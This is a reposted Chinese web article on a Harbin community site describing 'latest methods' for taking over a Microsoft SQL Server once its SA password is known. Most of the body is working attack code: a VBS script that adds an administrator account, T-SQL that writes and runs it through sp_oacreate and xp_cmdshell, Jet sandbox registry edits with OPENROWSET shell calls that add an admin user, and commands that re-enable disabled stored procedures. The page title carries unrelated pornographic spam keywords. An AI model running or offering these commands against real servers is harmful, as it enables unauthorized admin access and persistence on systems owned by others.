亚洲第一国产综合野狼_中文字幕有码～第一页_一级少妇精品久久久久久久_亚洲中文字幕永久在线不卡

<style id="jhwmm"></style>

<object id="jhwmm"><tt id="jhwmm"><noscript id="jhwmm"></noscript></tt></object>

<pre id="jhwmm"></pre>

<dfn id="jhwmm"><mark id="jhwmm"><legend id="jhwmm"></legend></mark></dfn>

<address id="jhwmm"></address>

<sup id="jhwmm"></sup>

　

站內(nèi)搜索

商業(yè)服務(wù) | 走進哈市┆新聞資訊┆分類信息┆哈市商圈┆百姓商城┆百姓問吧┆博客日志┆百姓社區(qū)┆電腦網(wǎng)絡(luò)┆健康知識┆哈市便民
百姓服務(wù) | 農(nóng)業(yè)資訊┆農(nóng)業(yè)技術(shù)┆農(nóng)業(yè)供求┆房產(chǎn)信息┆二手市場┆人才招聘┆交友征婚┆上網(wǎng)導航┆旅游頻道┆生活百科┆古玩知識
哈市區(qū)縣 | 道里道外南崗香坊平房松北呼蘭阿城五常市雙城市尚志市賓縣巴彥縣依蘭縣延壽縣木蘭縣通河縣方正縣

哈爾濱百姓網(wǎng)首頁 | 操作系統(tǒng) | 軟件應(yīng)用 | 平面設(shè)計 | 程序開發(fā) | 硬件維護 | 網(wǎng)絡(luò)安全

　您的位置：哈爾濱百姓網(wǎng) > 電腦網(wǎng)絡(luò) > 網(wǎng)絡(luò)安全 > 閱讀文章：Microsoft SQL Server SA權(quán)限最新入侵方法

Microsoft SQL Server SA權(quán)限最新入侵方法

2009-4-15 16:53:11 哈爾濱百姓網(wǎng) 來源:51CTO.com　瀏覽次【大中小】【打印】【關(guān)閉】

　　Microsoft SQL Server SA權(quán)限服務(wù)器一直是黑客青睞的對象，本文再向大家介紹幾種入侵方法，讀者可以根據(jù)情況找出防范辦法。

　　在獲得SA密碼后，往往因為服務(wù)器管理者或”前人”將net.exe和net1.exe被限制使用，無法添加管理員賬號。我們知道VBS在活動目錄(ADSI)部分有一個winnt對象，用來管理本地資源，利用它可以不依靠CMD等命令就能添加一個管理員，具體代碼如下：

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,綁定
Set oe=GetObject(os&"/Administrators,group") '屬性,admin組
Set od=ob.Create("user","test") '建立用戶
od.SetPassword "1234" '設(shè)置密碼
od.SetInfo '保存
Set of=GetObject(os&"/test",user) '得到用戶
oe.add os&"/test"

　　將上面的代碼保存為1.vbs，然后執(zhí)行，命令為“cscript 1.vbs”，這樣就會在系統(tǒng)添加一個系統(tǒng)名為test，密碼為1234的用戶。具體在查詢分析器執(zhí)行的代碼如下：

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject
("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.
ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject
(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create
("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject
(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'

　　執(zhí)行完上面的語句，再執(zhí)行下面這行代碼，這行代碼一定單獨執(zhí)行，不要與上面的放在一起執(zhí)行，否則會提示“c:\1.vbs正被另一個程序運行”而無法成功添加用戶：

exec master..xp_cmdshell 'cscript c:\1.vbs'

　　如果系統(tǒng)用戶沒有添加成功，有可能是因為系統(tǒng)用戶的密碼1234的太簡單，不符合服務(wù)器的復雜密碼策略，可以考慮設(shè)置的復雜些，然后再測試一下。也可以使用echo將代碼寫到1.vbs中，代碼格式為：

exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK")
>>1.vbs'

　　不過，不知道為什么所有帶“&”字符的命令行都無法寫入1.vbs，感興趣的朋友可以嘗試解決一下。

　　使用jet沙盤模式，可以解決XP_cmdshell等存儲過程和相關(guān)動態(tài)鏈接庫帶來的煩惱。出于安全原因，系統(tǒng)默認情況下沙盤模式未開啟，這就需要xp_regwrite開啟沙盤模式：

Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0
\Engines','SandBoxMode','REG_DWORD',1

　　然后執(zhí)行沙盤命令，在系統(tǒng)添加一個用戶名為test，密碼為1234的用戶：

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup 
administrators test /add")')

　　不同的操作系統(tǒng)，路徑也不一樣，需要根據(jù)情況做修改：

NT/2K: c:\winnt\system32\ 
XP/2003: c:\windows\system32\

　　另外Microsoft SQL Server2005在默認情況下，一些存儲過程是關(guān)閉著的，需要命令打開：

開啟XP_cmdshell：
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure
'xp_cmdshell', 1;RECONFIGURE;

開啟'OPENROWSET'：
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
'Ad Hoc Distributed Queries',1;RECONFIGURE;
開啟'sp_oacreate':
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 
'Ole Automation Procedures',1;RECONFIGURE;

[責任編輯：佚名]

返回主頁·分類信息·哈爾濱論壇·百姓問答更多

返回哈爾濱百姓網(wǎng)電腦頻道中心

【信息發(fā)布】【論壇交流】【留言反饋】【打印網(wǎng)頁】【大中小】【↑頂部】

　相關(guān)文章

·Web服務(wù)器如何避免CC攻擊	(2011-3-18 13:07:03)
·局域網(wǎng)遭ARP攻擊網(wǎng)絡(luò)掉線批處理	(2010-3-2 13:34:37)
·保障遠程桌面Web連接安全四項注意	(2010-1-25 10:28:12)
·教你六招處理服務(wù)器數(shù)據(jù)意外丟失	(2010-1-25 10:26:07)
·IIS安全設(shè)置讓Webshell無用武之地	(2009-11-3 11:07:16)
·SQL Server 2000 安全模	(2009-9-21 14:47:07)
·資深網(wǎng)管教你打造SSL加密的安全站點	(2009-8-4 12:21:34)
·利用麥咖啡打造超安全的Web站點目錄	(2009-6-23 10:05:18)
·讓你的電腦在局域網(wǎng)中輕松隱身	(2009-4-27 11:29:38)
·安全防護策略-打造堡壘主機	(2009-4-17 9:06:45)
·SA弱口令帶來的安全隱患	(2009-4-15 16:55:38)
·ISA Server 2006常用功能疑難	(2009-4-15 16:45:32)
·ISA Server 2006高級應(yīng)用指南	(2009-4-15 16:38:42)
·十招妙招確保WindowsXP系統(tǒng)安全	(2009-4-15 16:25:26)
·Windows 2003服務(wù)器安全配置終極技	(2009-4-15 16:18:12)
·Windows 2003 server變態(tài)磁盤	(2009-4-15 16:08:43)
·Windows下PHP+MySQL+IIS安全平臺III	(2009-4-15 15:49:42)
·Windows XP中鮮為人知的熱鍵漏洞	(2009-4-15 15:42:55)
·利用xp網(wǎng)絡(luò)身份驗證功能讓遠程連接	(2009-4-15 15:41:22)
·終級Win2003服務(wù)器安全配置篇	(2009-4-15 15:38:50)

　熱門文章　哈爾濱電腦

·安全防護策略-打造堡壘主機

·SQL Server到底需要使用哪些端口？

·把重要的Word 2003文檔放到菜單中

·您試圖在此 Web 服務(wù)器上訪問的

·Photoshop制作火焰的神龍

·Win2003架設(shè)多用戶隔離Ftp服務(wù)器

·XP系統(tǒng)服務(wù)恢復批處理

·還有2天發(fā)布 Windows7必備77條小知識

·情侶玩兒法：用虛擬硬盤打造堅不可摧的影子系統(tǒng)

·用U盤當鑰匙輕松繞過WinXP的登陸密碼

·Photoshop打造漂亮的心形掛鏈壁紙

　推薦文章　哈爾濱電腦

·精簡節(jié)約！小公司辦公打印省錢全攻略

·CSS布局方法的十八般技巧和兼容方案

·三種方法教你解決輸入法不顯示的問題

·當紅情侶QQ表情：茉莉和龍井

·Win 7出現(xiàn)休眠Bug 微軟提供解決方案

·將Powerpoint文檔轉(zhuǎn)換為Word文檔

·非常實用來學習連續(xù)供墨系統(tǒng)入門知識

·怕吃虧?怕假的?鑒別真假耗材的小竅門

·情侶玩兒法：用虛擬硬盤打造堅不可摧的影子系統(tǒng)

·開始—運行(cmd)命令大全

·您試圖在此 Web 服務(wù)器上訪問的

　最新文章　哈爾濱電腦

·Web服務(wù)器如何避免CC攻擊

·SQL Server到底需要使用哪些端口？

·XP系統(tǒng)服務(wù)恢復批處理

·局域網(wǎng)遭ARP攻擊網(wǎng)絡(luò)掉線批處理

·CISCO 2811 路由器配置命令全集

·避免“悲劇” 打印機使用技巧全面攻略

·保障遠程桌面Web連接安全四項注意

·教你六招處理服務(wù)器數(shù)據(jù)意外丟失

·挑選相紙有學問教你如何辨別相紙優(yōu)劣

·精簡節(jié)約！小公司辦公打印省錢全攻略

·CSS布局方法的十八般技巧和兼容方案

關(guān)于我們 | 廣告投放 | 用戶幫助 | 用戶注冊 | 留言反饋 | 網(wǎng)站建設(shè) | 網(wǎng)站地圖
Copyright Reserved 2008-2009 0451bx.cn 哈爾濱百姓網(wǎng)　版權(quán)所有
黑ICP備08101926號　

我要啦免費統(tǒng)計

<pre id="3mccl"><ol id="3mccl"><b id="3mccl"></b></ol></pre>